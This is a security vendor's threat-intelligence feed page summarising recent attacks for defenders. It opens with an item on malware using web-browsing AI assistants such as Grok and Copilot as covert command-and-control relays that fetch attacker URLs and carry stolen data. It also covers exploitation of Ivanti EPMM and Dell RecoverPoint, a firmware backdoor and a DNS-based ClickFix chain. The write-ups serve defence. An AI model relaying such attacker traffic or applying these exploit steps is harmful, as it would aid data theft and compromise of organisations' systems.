Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
Public AI Assistants Can Be Abused As Covert Command And Control Proxies Without Authentication Or API Keys
Check Point Research published findings describing how AI assistants that support web browsing or URL fetching can be abused as command-and-control relays, effectively using “AI as a proxy.” The technique was demonstrated against Grok and Microsoft Copilot using their web interfaces, with Check Point noting the approach can work without an API key or registered account when anonymous access is permitted. In the described scenario, malware prompts the AI assistant to fetch attacker-controlled URLs and return content in its response, creating a bidirectional channel where victim data can be sent out via URL query parameters and attacker instructions can be returned through the AI output. Check Point’s proof of concept used an embedded browser approach (WebView2) to emulate real browser behavior and submit prompts through the target AI web UIs. Check Point also outlines a broader near-term trend where implants may become more prompt-driven and adaptive, using model output to influence next actions during intrusion operations, although the report frames these as future-facing evolutions beyond the specific C2 proxy demonstration.
Impact: This method complicates network defense by masking malicious traffic behind high-reputation, commonly allowlisted domains. If adopted by threat actors, this approach could allow malware to bypass standard firewall rules and proxy restrictions, enabling persistent communication and data exfiltration that evades traditional blacklisting mechanisms.
Recommendation: Organizations should review their acceptable use policies regarding generative AI services and consider restricting access to unauthenticated web interfaces where possible. Security teams should monitor for unusual non-user-initiated traffic to AI domains, particularly from processes utilizing WebView2 or headless browsers. Network defenders should also enhance DLP inspection on outbound traffic to AI platforms to detect encrypted or encoded strings in URL parameters, which may indicate data exfiltration attempts. Check Point notes mitigation will require both AI provider controls and enterprise monitoring and policy enforcement.
Notepad++ v8.9.2 Introduces Double-Lock Update Security to Mitigate Hijacking Risks
Notepad++ released version 8.9.2 on February 16, 2026, to address critical weaknesses in its update mechanism previously targeted by state-sponsored actors. This “Double-Lock” update enforces stricter validation protocols to prevent update hijacking. The release also hardens the WinGUp auto-updater by removing the libcurl.dll dependency to eliminate DLL side-loading risks and disabling insecure SSL options such as CURLSSLOPT_ALLOW_BEAST and CURLSSLOPT_NO_REVOKE. The enhanced security model now requires two independent verifications during the update process: the XML file returned by the update server must be digitally signed (XMLDSig), and the installer binary downloaded from GitHub must also be signed. Previously, the lack of XML signature verification allowed attackers to manipulate the update flow. Additionally, the update restricts plugin management execution to programs signed with the specific WinGUp certificate, ensuring only valid Notepad++ processes can manage extensions.
Impact: These vulnerabilities in the update process posed a significant supply chain risk, as attackers could potentially hijack the mechanism to deliver malicious payloads to developers and IT administrators. By mandating dual signature verification, this release effectively neutralizes the specific techniques used in prior hijacking campaigns, ensuring that both the update instructions and the payloads are authentic and untampered with.
Recommendation: Update Notepad++ installations to version 8.9.2 to secure the update chain. Administrators who prefer to manage version control centrally can disable the auto-updater during deployment by using the MSI command msiexec /i npp.8.9.2.Installer.x64.msi NOUPDATER=1.
🚩 Critical Zero-Day Vulnerabilities in Ivanti EPMM Allow Unauthenticated Remote Code Execution and Are Currently Being Exploited in the Wild
Palo Alto Networks Unit 42 reportedthat two critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited. These issues affect enterprise mobile fleets across multiple sectors, including government and healthcare. CISA has added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) Catalog due to the severity of the threat. The vulnerabilities stem from code injection flaws in legacy bash scripts used by the Apache web server for URL rewriting. Unauthenticated attackers can exploit this by sending crafted HTTP GET requests to specific endpoints (such as those beginning with /mifs/c/appstore/fob/), triggering bash arithmetic expansion to inject malicious commands. Successful exploitation allows the attacker to execute arbitrary code with administrative or root privileges, often resulting in the deployment of web shells, reverse shells, or persistent backdoors.
Impact: Exploitation grants attackers full control over mobile device management (MDM) infrastructure without requiring any user interaction or valid credentials. This compromise allows threat actors to establish long-term persistence, conduct reconnaissance, and potentially pivot deeper into the corporate network. Because these are edge devices, successful attacks expose the organization to significant operational risk and potential data loss regarding managed mobile assets.
Recommendation: Organizations using affected technology should apply the vendor-recommended RPM patches (12.x.0.x or 12.x.1.x), which are version-specific and require no downtime. Monitor or hunt for HTTP requests containing patterns like gPath or attempts to download external payloads, as attackers are automating these attacks to install monitoring agents and backdoors.
🚩 UNC6201 Exploits Critical Dell RecoverPoint VM Zero-Day to Deploy GRIMBOLT Backdoor
Researchers from Mandiant and the Google Threat Intelligence Group (GTIG) have uncovered active exploitation of CVE-2026-22769, a critical (CVSS 10.0) zero-day vulnerability in Dell RecoverPoint for Virtual Machines. The activity is attributed to UNC6201, a suspected PRC-nexus threat cluster, and has been occurring since at least mid-2024. While the initial access vector in the investigated incidents has not been confirmed, UNC6201 is known to commonly target edge appliances. Investigators have observed the deployment of SLAYSTYLE web shells, BRICKSTORM malware, and a backdoor named GRIMBOLT, which replaced older BRICKSTORM binaries in September 2025. The root cause of the vulnerability is hard-coded default credentials in the Apache Tomcat Manager configuration (tomcat-users.xml). An attacker with network access to the affected Dell RecoverPoint VM appliance can authenticate using these credentials, upload a malicious WAR file via the /manager/text/deploy endpoint, and execute commands as root. UNC6201 established persistence by modifying the legitimate convert_hosts.sh startup script so the backdoor would execute at boot via rc.local. Investigators also observed the actor pivoting into VMware environments by creating temporary “Ghost NICs” for network access and using iptables-based Single Packet Authorization (SPA) rules to selectively redirect approved traffic for command-and-control activity.
Impact: Successful exploitation grants root-level remote code execution on affected Dell RecoverPoint appliances, enabling persistent backdoor access, lateral movement into VMware infrastructure, stealthy command-and-control communications, and potential data exfiltration or infrastructure manipulation. The use of hard-coded credentials, WAR-based web shell deployment, boot-time persistence, and covert SPA tunneling significantly increases the likelihood of prolonged, undetected compromise in enterprise virtualization environments.
Recommendation: Follow the official Dell Security Advisory and remediate CVE-2026-22769 across all RecoverPoint for Virtual Machines deployments. Review /home/kos/auditlog/fapi_cl_audit_log.log for suspicious /manager requests, especially PUT /manager/text/deploy activity. Examine /var/lib/tomcat9, /var/cache/tomcat9/Catalina, and /var/log/tomcat9/ for unauthorized deployments or suspicious deployWAR events. Inspect /home/kos/kbox/src/installation/distribution/convert_hosts.sh for unauthorized modifications referencing unknown binaries. Investigate unexpected virtual NIC additions (“Ghost NICs”) and unauthorized network port changes on ESXi hosts.
🚩 Keenadu Backdoor Embeds in Android Firmware Through Supply Chain Compromise Linking Major Botnets
Kaspersky published research describing Keenadu, a newly identified Android backdoor embedded in device firmware across several tablet brands. Kaspersky reports the infection occurs during the firmware build phase, with malicious code linked into libandroid_runtime.so, enabling the backdoor to inject into the Zygote process and load into the address space of every app on the device. Kaspersky notes that in some cases the compromised firmware was delivered via OTA updates, and that Keenadu activity has been observed at scale. Kaspersky describes Keenadu as a multi-stage loader with a client-server style architecture (AKServer in system_server and AKClient in other app processes) that enables delivery of app-targeted modules. Reported module behaviors include search engine hijacking in Chrome, install monetization, and stealthy interaction with ad elements, with additional modules observed in system apps such as a facial recognition service and the launcher. Kaspersky states it established links between botnet ecosystems including Triada, BADBOX, Vo1d, and Keenadu, and reports 13,715 users worldwide encountered Keenadu or its modules. Kaspersky also notes Keenadu-related modules were found in standalone apps distributed via third-party repositories and, in some cases, official stores like Google Play and Xiaomi GetApps. The report states this backdoor is currently used primarily for ad fraud, but Kaspersky does not rule out future credential theft.
Impact: Firmware-level compromise undermines core Android security boundaries because the malicious code operates inside every app process, effectively bypassing app sandbox protections and allowing broad access to user and application data. Kaspersky indicates Keenadu provides operators with remote control capability and supports permission manipulation and device data collection interfaces, while modules observed in the wild can drive monetization activity such as ad interaction, app install fraud, and browser search hijacking. For organizations, infected Android devices represent persistent risk that may not be fully remediable with standard mobile cleanup workflows if the firmware itself is compromised.
Recommendation: For devices where libandroid_runtime.so is infected, Kaspersky notes the system partition is typically read-only and the infected library cannot be removed without breaking the firmware, so remediation depends on obtaining a clean firmware release from the manufacturer or replacing the firmware entirely; if no clean firmware exists, Kaspersky recommends stopping use of the infected device. If a system app is infected, Kaspersky recommends replacing the affected functionality where possible (for example, using an alternative launcher), and disabling the infected system app via ADB when feasible (adb shell pm disable –user 0 %PACKAGE%).
Microsoft warns of DNS-based ClickFix variant abusing nslookup for malware staging and ModeloRAT delivery
Microsoft Threat Intelligence disclosed a new ClickFix variant that abuses nslookup to retrieve a second-stage payload via DNS rather than traditional HTTP/S delivery. In the observed attack chain, victims are socially engineered—typically via fake CAPTCHA or troubleshooting prompts—to open the Windows Run dialog and execute a cmd.exe command. That command performs a DNS lookup against a hard-coded external resolver instead of the system’s default DNS server. The response is filtered to extract the Name: field, which is then executed locally as the next-stage payload. Microsoft describes this as DNS-based staging: a lightweight signaling and payload channel that blends into normal DNS traffic and reduces reliance on web requests. The technique adds flexibility for operators while potentially evading controls tuned for suspicious HTTP downloads. Post-execution, the payload chain downloads a ZIP archive from azwsappdev[.]com, extracts a malicious Python script, conducts system reconnaissance, and drops a VBScript responsible for launching ModeloRAT (a Python-based remote access trojan previously associated with CrashFix campaigns). Persistence is achieved via creation of an LNK shortcut in the Windows Startup folder pointing to the VBScript.
Impact: This variation shifts initial staging from web traffic to DNS, complicating detection strategies that emphasize HTTP-based indicators. Because ClickFix relies on user-driven execution, traditional exploit prevention controls may not trigger. Successful compromise can result in remote access, reconnaissance, credential theft, and persistent footholds via startup folder artifacts.
Recommendation: Recommendations include monitoring and or hunting for anomalous nslookup executions spawned by cmd.exe from user context, especially where external resolvers are specified explicitly. Inspect command-line logging for patterns that pipe DNS output through utilities such as findstr, for /f, or similar parsing constructs. Restrict execution of unsigned or unapproved scripts via application control policies, and enable enhanced PowerShell and command-line auditing. Review Startup folder locations for unauthorized LNK files referencing script interpreters. Where infection is suspected, isolate affected hosts, invalidate credentials, and investigate for outbound connections consistent with RAT command-and-control traffic.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.